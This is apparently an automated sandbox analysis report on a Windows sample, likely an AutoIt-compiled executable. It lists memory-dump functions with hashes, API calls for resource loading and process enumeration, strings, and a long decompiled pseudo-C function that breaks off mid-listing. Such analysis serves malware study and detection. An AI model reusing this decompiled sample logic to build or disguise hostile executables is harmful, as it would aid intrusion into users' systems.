Opcode ID: b9be08c5601e6d00e380160ee1e8e028d3dfda8ba28bfd681d4a0d21edb90485
Instruction ID: 0a4a81ed0aac39d22c126dfb76eb156dcbb9c17051f431c502aee346236a60a2
Opcode Fuzzy Hash: b9be08c5601e6d00e380160ee1e8e028d3dfda8ba28bfd681d4a0d21edb90485
Instruction Fuzzy Hash: F091C53198A7C0DEC731EB6994905EAFFF5AF2A304B4849ADD0C793A42D620E508C77D

Uniqueness

Uniqueness Score: -1.00%

Function 00DB4E89, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00DB4D8E,?,?,00000000,00000000), ref: 00DB4E99
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00DB4D8E,?,?,00000000,00000000), ref: 00DB4EB0
LoadResource.KERNEL32(?,00000000,?,?,00DB4D8E,?,?,00000000,00000000,?,?,?,?,?,?,00DB4E2F), ref: 00DED937
SizeofResource.KERNEL32(?,00000000,?,?,00DB4D8E,?,?,00000000,00000000,?,?,?,?,?,?,00DB4E2F), ref: 00DED94C
LockResource.KERNEL32(00DB4D8E,?,?,00DB4D8E,?,?,00000000,00000000,?,?,?,?,?,?,00DB4E2F,00000000), ref: 00DED95F

Strings

SCRIPT, xrefs: 00DB4EA6

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 41b37abcc8b5bc9cab16e9d55445e2cda15b30814cbe71823e0fe1b05fe5926a
Instruction ID: 1892fefaa55f9ddd2f0d4ae36264a0a1bd61fd7bcaddbf4010f9d29a4d6091e2
Opcode Fuzzy Hash: 41b37abcc8b5bc9cab16e9d55445e2cda15b30814cbe71823e0fe1b05fe5926a
Instruction Fuzzy Hash: FB115A75640704FFD7218BA6ED48F677BBAFBC5B11F244268F40696261DF61E8048A70

Uniqueness

Uniqueness Score: -1.00%

Function 00DBFCE0, Relevance: 9.8, APIs: 3, Strings: 2, Instructions: 1040COMMON

Download Yara Rule

Strings

pb, xrefs: 00DF49B9
%, xrefs: 00DBFCF3

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: BuffCharUpper
String ID: pb$%
API String ID: 3964851224-1798441486
Opcode ID: 30fcf99c7f0c2502b0e13c65a7a238827fc04040a8ca0f671afa1d89fff6ff75
Instruction ID: 2778556907713d9b1a98d44da94e2449a683c5eb324f50699ad2e207b172bc48
Opcode Fuzzy Hash: 30fcf99c7f0c2502b0e13c65a7a238827fc04040a8ca0f671afa1d89fff6ff75
Instruction Fuzzy Hash: DB924870608341CFD724DF14C480B6ABBE5BF85304F19896DE99A9B352D771EC45CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00DBE6A0, Relevance: 7.4, Strings: 5, Instructions: 1102COMMON

Download Yara Rule

Strings

Dd, xrefs: 00DF3B2E
Dd, xrefs: 00DBEABA
Variable must be of type 'Object'., xrefs: 00DF3E62
Dd, xrefs: 00DF3AF5
Dd, xrefs: 00DBEAC1

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: Dd$Dd$Dd$Dd$Variable must be of type 'Object'.
API String ID: 0-2781164977
Opcode ID: 0163e15586bc5ded1c81e4e9fe3e1865f904fb0cbe96baf4b7b97816ba78e971
Instruction ID: b1845f2241623e4f88905550d35535de72afff30ae5be8d827a2b19c1526b152
Opcode Fuzzy Hash: 0163e15586bc5ded1c81e4e9fe3e1865f904fb0cbe96baf4b7b97816ba78e971
Instruction Fuzzy Hash: 5DA28E74A00209CFCB14CF58C880AEEB7B2FF58314F298559E956AB351D775ED86CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00E13C55, Relevance: 6.1, APIs: 4, Instructions: 85processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00E13C7A
Process32FirstW.KERNEL32(00000000,?), ref: 00E13C88
Process32NextW.KERNEL32(00000000,?), ref: 00E13CA8
FindCloseChangeNotification.KERNEL32(00000000), ref: 00E13D52

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
String ID:
API String ID: 3243318325-0
Opcode ID: 40f30004a05abdc057f594856d22f9d866eedd172a32ba36b4a0c1dd4e7423a8
Instruction ID: 50ce3a0656d836c8cb68802c039b846fd0e77f997d7d10d82bf30309cccbafaa
Opcode Fuzzy Hash: 40f30004a05abdc057f594856d22f9d866eedd172a32ba36b4a0c1dd4e7423a8
Instruction Fuzzy Hash: CE31B471108305DFD314EF60D885AEFBBF8EF95354F50092DF482961A1EB719A89CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00DBDF00, Relevance: 3.5, APIs: 2, Instructions: 539COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef9addcb0f6146f2372dceb743688ef481eab33b619c5fddeb2b71fd5a2ff0fe
Instruction ID: 8d2fec4ac54d42d0bfbe740365b1b53e56c1e3f5c3dbc04cb466ca6942a95f56
Opcode Fuzzy Hash: ef9addcb0f6146f2372dceb743688ef481eab33b619c5fddeb2b71fd5a2ff0fe
Instruction Fuzzy Hash: 46228B74A00219DFDB14DF58C480AFAB7F1FF08310F198169E986AB351E774A985CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 00DC09D0, Relevance: 64.3, APIs: 27, Strings: 9, Instructions: 1300
windowsleeptimeCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00DC09D0(void* __ebx, void* __ecx, void* __fp0, signed int _a4) {
				struct tagMSG _v32;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v68;
				char _v72;
				char _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				char _v120;
				char _v124;
				char _v128;
				int _v136;
				struct HWND__* _v140;
				struct HWND__* _v148;
				int _v152;
				struct HWND__* _v156;
				struct HWND__* _v164;
				signed int _v168;
				char _v172;
				char _v176;
				char _v180;
				int* _v192;
				struct tagMSG _v216;
				int _v224;
				intOrPtr _v228;
				int _v232;
				struct HWND__* _v236;
				signed int _v240;
				struct HWND__* _v244;
				struct HWND__* _v248;
				signed int _v256;
				char _v257;
				void* _v260;
				struct HWND__* _v264;
				intOrPtr _v268;
				int _v272;
				signed int _v276;
				char _v280;
				signed int _v284;
				signed int _v288;
				long _v292;
				void* _v296;
				long _v300;
				void* _v304;
				int _v312;
				void* _v316;
				struct HWND__* _v320;
				void* _v324;
				signed int _v328;
				signed int _v332;
				char _v333;
				intOrPtr _v336;
				void* _v340;
				signed int _v344;
				intOrPtr _v352;
				long _v356;
				struct HWND__* _v364;
				void* __edi;
				intOrPtr _t473;
				signed int _t475;
				intOrPtr _t476;
				void* _t477;
				intOrPtr _t478;
				void* _t484;
				void* _t490;
				signed int _t492;
				int _t494;
				long _t495;
				void* _t498;
				void* _t520;
				int _t536;
				short* _t541;
				int* _t542;
				void** _t543;
				void* _t549;
				intOrPtr _t577;
				void _t578;
				void* _t587;
				intOrPtr _t594;
				void _t595;
				int _t598;
				void* _t599;
				void* _t600;
				void* _t602;
				signed int _t608;
				int _t609;
				signed int _t613;
				intOrPtr _t619;
				signed int _t621;
				void* _t630;
				void* _t636;
				int _t644;
				intOrPtr _t647;
				intOrPtr _t648;
				intOrPtr _t649;
				intOrPtr _t650;
				intOrPtr _t652;
				signed int _t655;
				intOrPtr* _t656;
				intOrPtr _t658;
				intOrPtr _t659;
				int _t674;
				signed int _t675;
				void* _t689;
				int _t690;
				long _t691;
				void* _t703;
				void* _t704;
				long _t707;
				short _t708;
				void* _t709;
				void* _t712;
				void* _t733;
				void* _t740;
				void* _t741;
				void* _t747;
				signed int _t764;
				void* _t769;
				signed int _t778;
				void* _t795;
				signed int _t798;
				void* _t799;
				void* _t802;
				intOrPtr _t805;
				void* _t806;
				signed int _t838;
				void* _t839;
				void* _t843;
				void* _t846;
				long _t848;
				void* _t849;
				intOrPtr _t850;
				intOrPtr _t851;
				long _t852;
				signed int _t857;
				void* _t863;
				signed int _t864;
				void* _t866;
				intOrPtr* _t867;
				void* _t868;
				int* _t869;
				void* _t870;
				signed int _t873;
				signed int _t874;
				signed int _t876;
				signed int _t877;
				intOrPtr* _t879;
				intOrPtr _t881;
				signed int _t882;
				void* _t884;
				void* _t921;

				_t931 = __fp0;
				_t747 = __ebx;
				_t884 = (_t882 & 0xfffffff8) - 0x160;
				_t846 = __ecx;
				_v296 = __ecx;
				_t473 =  *((intOrPtr*)(__ecx + 0xec));
				if(_t473 >= 0xed8) {
					 *0xe75280 = 0;
					_t475 = E00E19E4A(__ecx, __fp0, 0x9a, 0xffffffff) | 0xffffffff;
					L56:
					return _t475;
				}
				_t476 = _t473 + 1;
				 *((intOrPtr*)(__ecx + 0xec)) = _t476;
				if(_t476 == 1) {
					_t477 =  *(__ecx + 0x11c);
					_v300 = _t477;
					while(1) {
						__eflags = _t477;
						if(__eflags == 0) {
							goto L2;
						}
						_t741 = E00DB9E5D(_t846,  *_t477);
						__eflags = _t741;
						if(_t741 != 0) {
							__eflags =  *((intOrPtr*)(_t741 + 0x10)) + 1;
							E00E06349(_t846, _t837, _t931,  *((intOrPtr*)(_t741 + 0x10)) + 1, 1);
						}
						_t752 =  &_v300;
						E00E06774(_t752,  &_v292);
						_t477 = _v304;
					}
				}
				L2:
				 *((char*)(_t846 + 0x144)) = 0;
				if( *((char*)(_t846 + 0xfc)) != 0) {
					L53:
					_t478 =  *((intOrPtr*)(_t846 + 0xec));
					 *((char*)(_t846 + 0x144)) = 0;
					if(_t478 == 1) {
						E00DC1070(_t846);
						__eflags =  *((char*)(_t846 + 0xfc)) - 1;
						if(__eflags == 0) {
							L55:
							_t475 = 0;
							goto L56;
						}
						E00DC1093(_t846, _t837, __eflags, _t931);
						LockWindowUpdate(0);
						DestroyWindow( *0xe752ac);
						_t484 = GetMessageW( &_v32, 0, 0, 0);
						__eflags = _t484;
						if(_t484 <= 0) {
							goto L55;
						}
						do {
							TranslateMessage( &_v32);
							DispatchMessageW( &_v32);
							_t490 = GetMessageW( &_v32, 0, 0, 0);
							__eflags = _t490;
						} while (_t490 > 0);
						goto L55;
					}
					 *((intOrPtr*)(_t846 + 0xec)) = _t478 - 1;
					goto L55;
				} else {
					while(1) {
						_t837 = 2;
						if( *((char*)(_t846 + 0x144)) != 0) {
							goto L53;
						}
						if( *0xe75281 != 0) {
							__eflags =  *((char*)(_t846 + 0x145));
							if(__eflags == 0) {
								L11:
								if( *0xe764a8 != 0) {
									_t492 =  *0xe764ac; // 0x0
									_t857 =  *(_t492 + 4);
									_v356 =  *_t492;
									L00DD0E2C(_t492);
									 *0xe764a8 =  *0xe764a8 - 1;
									_t884 = _t884 + 4;
									 *0xe764ac = _t857;
									asm("sbb esi, esi");
									_t752 = 0;
									 *0xe764b0 =  *0xe764b0 &  ~_t857;
									_t837 =  *(_t846 + 0x1c8);
									_v340 = 0;
									__eflags = _t837;
									if(_t837 == 0) {
										L125:
										__eflags = _t752 - _t837;
										if(__eflags == 0) {
											_t837 = 2;
											goto L12;
										}
										_t733 = E00DB9E5D(_t846,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t846 + 0x1c4)) + _t752 * 4)))) + 8);
										E00DB8047(_t846 + 0x14c,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t846 + 0x1c4)) + _v344 * 4)))) + 0x18);
										_t752 = _t846;
										E00DBB73C(_t752, _t837, _t931,  *((intOrPtr*)(_t733 + 0x10)) + 1, 1, 0);
										L51:
										L52:
										if( *((char*)(_t846 + 0xfc)) == 0) {
											continue;
										}
										goto L53;
									}
									_t881 =  *((intOrPtr*)(_t846 + 0x1c4));
									_t852 = _v356;
									do {
										_t740 =  *( *(_t881 + _t752 * 4));
										__eflags = _t740;
										if(_t740 == 0) {
											goto L123;
										}
										__eflags =  *_t740 - _t852;
										if( *_t740 == _t852) {
											break;
										}
										L123:
										_t752 = _t752 + 1;
										__eflags = _t752 - _t837;
									} while (_t752 < _t837);
									_t846 = _v296;
									_v340 = _t752;
									goto L125;
								}
								L12:
								if( *0xe75287 == 1) {
									__eflags =  *0xe75281;
									if(__eflags != 0) {
										goto L13;
									}
									Sleep(0xa);
									goto L52;
								}
								L13:
								if( *((intOrPtr*)(_t846 + 0x454)) == 0 ||  *0xe7641c != 0) {
									L22:
									if( *0xe757bc == 0 ||  *((char*)(_t846 + 0x458)) == 1) {
										L32:
										if( *((intOrPtr*)(_t846 + 0x184)) != 0) {
											__eflags =  *((char*)(_t846 + 0x484)) - 1;
											if(__eflags == 0) {
												goto L33;
											}
											 *((char*)(_t846 + 0x484)) = 1;
											_v264 = 0;
											_v180 = 0xe3fb84;
											_v344 = 0;
											_v176 = 0;
											_v172 = 0;
											_v168 = 0;
											E00E19A15( &_v128, _t846,  *((intOrPtr*)(_t846 + 0x188)));
											E00E0D4F2(_t846 + 0x184);
											_t871 = _v128;
											_v232 = 0;
											E00DB9837(E00DB9960(_t747,  &_v240,  *_v128), _t747,  *((intOrPtr*)(_t871 + 4)));
											_t837 = E00DB9E5D(_t846,  *((intOrPtr*)( *((intOrPtr*)(_t871 + 4)) + 8)));
											_v344 = _t837;
											_t764 =  *(_t837 + 0x10);
											_t520 = E00DB7068(_t764);
											 *(_t846 + 0xf4) = _t764;
											_t873 = 3;
											__eflags =  *(_t837 + 0x14);
											_v320 = _t520;
											if( *(_t837 + 0x14) <= 0) {
												L174:
												E00DB8401(_t837,  *(_t837 + 0x10));
												_t874 = 3;
												_v292 = 3;
												_v344 = 1;
												__eflags =  *((intOrPtr*)(_v336 + 0x14)) - 1;
												if(__eflags < 0) {
													L215:
													E00DB7DE1(_t747,  &_v48, __eflags, L"@COM_EVENTOBJ");
													__eflags = _v228 - 6;
													E00DB84C0(_t846,  &_v52, (0 | _v228 != 0x00000006) - 0x00000001 & _v240, 0, 1);
													E00DB5904( &_v68);
													E00DBB73C(_t846, _t837, _t931,  *((intOrPtr*)(_v352 + 0x10)) + 1, 0, 0);
													E00DB82DF(_t747, 0xe76280);
													_t769 = _v260;
													__eflags = _t769;
													if(_t769 != 0) {
														E00DB79DD(_t769, _t769);
														_v232 = 0;
													}
													_t536 = _v224;
													__eflags = _t536 - 5;
													if(__eflags < 0) {
														L253:
														_v224 = 1;
														_v236 = 0;
														E00E0617E( &_v128);
														_t752 =  &_v180;
														E00E0617E(_t752);
														 *((char*)(_t846 + 0x484)) = 0;
														goto L51;
													} else {
														_t608 = _t536 + 0xfffffffb;
														__eflags = _t608 - 0xa;
														if(__eflags > 0) {
															goto L253;
														}
														switch( *((intOrPtr*)(_t608 * 4 +  &M00DF5CBB))) {
															case 0:
																__eflags = __esi;
																if(__eflags != 0) {
																	__ecx = __esi;
																	__eax = E00DB8CD4(__ecx, __edi, __eflags, __ecx);
																}
																goto L253;
															case 1:
																goto L253;
															case 2:
																__eflags = __esi;
																if(__eflags == 0) {
																	goto L253;
																}
																_push(__esi);
																__imp__#9();
																goto L252;
															case 3:
																__eflags = __esi;
																if(__eflags == 0) {
																	goto L253;
																}
																__ecx = __esi + 8;
																goto L251;
															case 4:
																__eax = L00DD0E2C( *((intOrPtr*)(__esi + 4)));
																goto L252;
															case 5:
																__eflags = __esi;
																if(__eflags != 0) {
																	__ecx = __esi;
																	__eax = E00E06E7A(__ecx, __ecx);
																}
																goto L253;
															case 6:
																__eflags = __esi;
																if(__eflags == 0) {
																	goto L253;
																}
																__ecx = __esi;
																L251:
																__eax = E00DB5904(__ecx);
																L252:
																__eax = L00DD0E2C(__esi);
																goto L253;
															case 7:
																__eflags = __esi;
																if(__eflags != 0) {
																	__ecx = __esi;
																	__eax = E00E06E8F(__ebx, __ecx, __edi, __ecx);
																}
																goto L253;
														}
													}
												} else {
													goto L175;
												}
												do {
													L175:
													_t838 = 0;
													_v256 = 0;
													_t798 =  *(_v304 + 4);
													_v356 = _t798;
													_t619 =  *((intOrPtr*)(_t798 + _t874 * 4));
													__eflags =  *(_t619 + 8);
													if( *(_t619 + 8) != 0) {
														L182:
														_t848 = _v356;
														_t839 = 4 + _t874 * 4;
														_v328 = 1;
														_t799 = 0;
														__eflags = 0;
														_t876 = _v328;
														while(1) {
															_t621 =  *( *((intOrPtr*)(_t839 + _t848)) + 8) & 0x0000ffff;
															__eflags = _t621 - 0x47;
															if(_t621 != 0x47) {
																goto L185;
															}
															L184:
															_t799 = _t799 + 1;
															L196:
															_t876 = _t876 + 1;
															_t839 = _t839 + 4;
															_t621 =  *( *((intOrPtr*)(_t839 + _t848)) + 8) & 0x0000ffff;
															__eflags = _t621 - 0x47;
															if(_t621 != 0x47) {
																goto L185;
															}
															goto L184;
															L185:
															__eflags = _t621 - 0x48;
															if(_t621 != 0x48) {
																__eflags = _t621 - 0x40;
																if(_t621 != 0x40) {
																	goto L196;
																}
																__eflags = _t799;
																if(_t799 == 0) {
																	L187:
																	_t846 = _v296;
																	_t837 = _v256;
																	_v328 = _t876;
																	_t876 = _v288;
																	__eflags = _v340 - _v264;
																	if(_v340 <= _v264) {
																		__eflags = _t837;
																		E00DB84C0(_t846,  *((intOrPtr*)( *((intOrPtr*)(_v356 + _t876 * 4)))),  *_v344, _t837, 1);
																		goto L214;
																	}
																	_v324 = 0;
																	_v356 = _t876 + 2;
																	_v316 = 0;
																	_v312 = 1;
																	_t636 = E00DB9EA0(_t747, _t846, _t931, _v304,  &_v356,  &_v324, _v328 + _t876);
																	__eflags = _t636;
																	if(_t636 < 0) {
																		_t795 = _v316;
																		__eflags = _t795;
																		if(_t795 != 0) {
																			E00DB79DD(_t795, _t795);
																			_v320 = 0;
																		}
																		_t609 = _v312;
																		__eflags = _t609 - 5;
																		if(_t609 < 5) {
																			L171:
																			_v312 = 1;
																			_v324 = 0;
																			L172:
																			E00DB9C90(_t747,  &_v236);
																			E00E0617E( &_v128);
																			_t752 =  &_v180;
																			E00E0617E(_t752);
																			 *((char*)(_t846 + 0x484)) = 0;
																			goto L33;
																		} else {
																			_t613 = _t609 + 0xfffffffb;
																			__eflags = _t613 - 0xa;
																			if(_t613 > 0xa) {
																				goto L171;
																			}
																			switch( *((intOrPtr*)(_t613 * 4 +  &M00DF5CE7))) {
																				case 0:
																					__ecx = _v324;
																					__eflags = __ecx;
																					if(__eflags != 0) {
																						__eax = E00DB8CD4(__ecx, __edi, __eflags, __ecx);
																					}
																					goto L171;
																				case 1:
																					goto L171;
																				case 2:
																					_t614 = _v324;
																					__eflags = _t614;
																					if(_t614 == 0) {
																						goto L171;
																					}
																					_push(_t614);
																					__imp__#9();
																					_push(_v328);
																					goto L170;
																				case 3:
																					__esi = _v324;
																					__eflags = __esi;
																					if(__esi == 0) {
																						goto L171;
																					}
																					_t353 = __esi + 8; // 0x8
																					__ecx = _t353;
																					goto L169;
																				case 4:
																					_v324 = L00DD0E2C( *((intOrPtr*)(_v324 + 4)));
																					_push(_v324);
																					goto L170;
																				case 5:
																					__ecx = _v324;
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = E00E06E7A(__ecx, __ecx);
																					}
																					goto L171;
																				case 6:
																					__esi = _v324;
																					__eflags = __esi;
																					if(__esi == 0) {
																						goto L171;
																					}
																					__ecx = __esi;
																					L169:
																					__eax = E00DB5904(__ecx);
																					_push(__esi);
																					L170:
																					L00DD0E2C();
																					_t884 = _t884 + 4;
																					goto L171;
																				case 7:
																					__ecx = _v324;
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = E00E06E8F(__ebx, __ecx, __edi, __ecx);
																					}
																					goto L171;
																			}
																		}
																	}
																	E00DB84C0(_t846,  *((intOrPtr*)( *((intOrPtr*)( *(_v304 + 4) + _t876 * 4)))),  &_v324, _v256 | 0x00000200, 1);
																	_t799 = _v332;
																	__eflags = _t799;
																	if(_t799 != 0) {
																		E00DB79DD(_t799, _t799);
																		_v320 = 0;
																	}
																	_t644 = _v312;
																	__eflags = _t644 - 5;
																	if(_t644 < 5) {
																		L212:
																		_v312 = 1;
																		_v324 = 0;
																		goto L214;
																	} else {
																		_t621 = _t644 + 0xfffffffb;
																		__eflags = _t621 - 0xa;
																		if(_t621 > 0xa) {
																			goto L212;
																		}
																		switch( *((intOrPtr*)(_t621 * 4 +  &M00DF5C8F))) {
																			case 0:
																				__ecx = _v324;
																				__eflags = __ecx;
																				if(__eflags != 0) {
																					__eax = E00DB8CD4(__ecx, __edi, __eflags, __ecx);
																				}
																				goto L212;
																			case 1:
																				goto L212;
																			case 2:
																				__eax = _v324;
																				__eflags = __eax;
																				if(__eax == 0) {
																					goto L212;
																				}
																				_push(__eax);
																				__imp__#9();
																				_push(_v328);
																				goto L211;
																			case 3:
																				__eax = _v324;
																				_v356 = __eax;
																				__eflags = __eax;
																				if(__eax == 0) {
																					goto L212;
																				}
																				_t307 = __eax + 8; // 0x8
																				__ecx = _t307;
																				goto L210;
																			case 4:
																				_v324 = L00DD0E2C( *((intOrPtr*)(_v324 + 4)));
																				_push(_v324);
																				goto L211;
																			case 5:
																				__ecx = _v324;
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = E00E06E7A(__ecx, __ecx);
																				}
																				goto L212;
																			case 6:
																				__eax = _v324;
																				_v356 = __eax;
																				__eflags = __eax;
																				if(__eax == 0) {
																					goto L212;
																				}
																				__ecx = __eax;
																				L210:
																				__eax = E00DB5904(__ecx);
																				_push(_v356);
																				L211:
																				__eax = L00DD0E2C();
																				__esp = __esp + 4;
																				goto L212;
																			case 7:
																				__ecx = _v324;
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = E00E06E8F(__ebx, __ecx, __edi, __ecx);
																				}
																				goto L212;
																		}
																	}
																}
																goto L196;
															}
															_t799 = _t799 - 1;
															__eflags = _t799;
															if(_t799 >= 0) {
																goto L196;
															}
															goto L187;
														}
													} else {
														goto L176;
													}
													do {
														L176:
														_t647 =  *((intOrPtr*)( *((intOrPtr*)(_t798 + _t874 * 4))));
														__eflags = _t647 - 0x24;
														if(_t647 == 0x24) {
															L179:
															_t874 = _t874 + 1;
															__eflags = _t874;
															goto L180;
														}
														__eflags = _t647 - 0x1e;
														if(_t647 != 0x1e) {
															goto L180;
														}
														_t838 = 0x100;
														goto L179;
														L180:
														_t648 =  *((intOrPtr*)(_t798 + _t874 * 4));
														__eflags =  *((short*)(_t648 + 8));
													} while ( *((short*)(_t648 + 8)) == 0);
													_v256 = _t838;
													_v288 = _t874;
													goto L182;
													L214:
													_v344 = _v344 + 4;
													_t874 = _t876 + _v328 + 1;
													_t630 = _v340 + 1;
													_v288 = _t874;
													_v340 = _t630;
													__eflags = _t630 -  *((intOrPtr*)(_v332 + 0x14));
												} while (__eflags <= 0);
												goto L215;
											}
											_t841 = _v124 + 8;
											__eflags = _t841;
											_v328 = _t841;
											while(1) {
												_t802 =  *((intOrPtr*)(_t520 + 4));
												_v340 = _t802;
												_t649 =  *((intOrPtr*)(_t802 + _t873 * 4));
												__eflags =  *((short*)(_t649 + 8));
												if( *((short*)(_t649 + 8)) != 0) {
													goto L155;
												}
												L147:
												_t837 =  *(_v304 + 4);
												do {
													_t656 =  *((intOrPtr*)(_t837 + 4 + _t873 * 4));
													__eflags =  *((short*)(_t656 + 8)) - 0x33;
													if( *((short*)(_t656 + 8)) == 0x33) {
														L151:
														_t658 =  *((intOrPtr*)( *((intOrPtr*)(_t837 + _t873 * 4))));
														__eflags = _t658 - 0x24;
														if(_t658 == 0x24) {
															goto L153;
														}
														__eflags = _t658 - 0x1e;
														if(_t658 != 0x1e) {
															L167:
															E00E19E4A(_t846, _t931, 0x91,  *((short*)( *((intOrPtr*)( *(_v304 + 4) + 4 + _t873 * 4)) + 0xa)));
															goto L172;
														}
														goto L153;
													}
													__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t837 + _t873 * 4)))) -  *_t656;
													if( *((intOrPtr*)( *((intOrPtr*)(_t837 + _t873 * 4)))) ==  *_t656) {
														goto L167;
													}
													_t802 = _v340;
													goto L151;
													L153:
													_t659 =  *((intOrPtr*)(_t802 + 4 + _t873 * 4));
													_t873 = _t873 + 1;
													__eflags =  *((short*)(_t659 + 8));
												} while ( *((short*)(_t659 + 8)) == 0);
												_t841 = _v328;
												L155:
												_t650 =  *((intOrPtr*)(_t802 + 4 + _t873 * 4));
												_t877 = _t873 + 1;
												__eflags =  *((short*)(_t650 + 8)) - 0x41;
												if( *((short*)(_t650 + 8)) != 0x41) {
													L162:
													E00E060EF(_t747,  &_v180,  *_t841);
													_t873 = _t877 + 1;
													_t652 = _v336;
													_t805 = _v268 + 1;
													_t841 = _v332 + 4;
													_v268 = _t805;
													_v332 = _v332 + 4;
													__eflags = _t805 -  *((intOrPtr*)(_t652 + 0x14));
													if(_t805 >=  *((intOrPtr*)(_t652 + 0x14))) {
														_t837 = _v332;
														_v344 = _v176;
														goto L174;
													}
													_t520 = _v304;
													_t802 =  *((intOrPtr*)(_t520 + 4));
													_v340 = _t802;
													_t649 =  *((intOrPtr*)(_t802 + _t873 * 4));
													__eflags =  *((short*)(_t649 + 8));
													if( *((short*)(_t649 + 8)) != 0) {
														goto L155;
													}
													goto L147;
												}
												_t843 = _v340;
												_t877 = _t877 + 1;
												_t806 = 0;
												__eflags = 0;
												while(1) {
													_t655 =  *( *((intOrPtr*)(_t843 + _t877 * 4)) + 8) & 0x0000ffff;
													__eflags = _t655 - 0x47;
													if(_t655 != 0x47) {
														goto L159;
													}
													L158:
													_t806 = _t806 + 1;
													L166:
													_t877 = _t877 + 1;
													_t655 =  *( *((intOrPtr*)(_t843 + _t877 * 4)) + 8) & 0x0000ffff;
													__eflags = _t655 - 0x47;
													if(_t655 != 0x47) {
														goto L159;
													}
													goto L158;
													L159:
													__eflags = _t655 - 0x48;
													if(_t655 != 0x48) {
														__eflags = _t655 - 0x40;
														if(_t655 != 0x40) {
															goto L166;
														}
														__eflags = _t806;
														if(_t806 == 0) {
															L161:
															_t841 = _v328;
															goto L162;
														}
														goto L166;
													}
													_t806 = _t806 - 1;
													__eflags = _t806;
													if(_t806 >= 0) {
														goto L166;
													}
													goto L161;
												}
											}
										}
										L33:
										if( *0xe75930 != 0) {
											__eflags =  *((char*)(_t846 + 0x459)) - 1;
											if(__eflags == 0) {
												goto L34;
											}
											E00DB7667( &(_v216.message), __eflags);
											while(1) {
												_t498 = E00E12408(0xe75890,  &_v216);
												__eflags = _t498;
												if(_t498 == 0) {
													break;
												}
												__eflags = _v216.wParam;
												if(_v216.wParam == 0) {
													continue;
												}
												_t870 = E00DB9E5D(_t846,  &(_v216.message));
												__eflags = _t870;
												if(_t870 == 0) {
													continue;
												}
												_v148 = 0;
												_v140 = 0;
												_v136 = 1;
												E00DB98C0(_t747,  &_v148);
												_v136 = 1;
												_v148 = _v216.hwnd;
												E00DB7DE1(_t747,  &_v96, __eflags, L"@TRAY_ID");
												E00DB89B3(0xe76270, _t837, _t846, __eflags,  &_v100,  &_v152, 1);
												E00DB5904( &_v112);
												 *((char*)(_t846 + 0x459)) = 1;
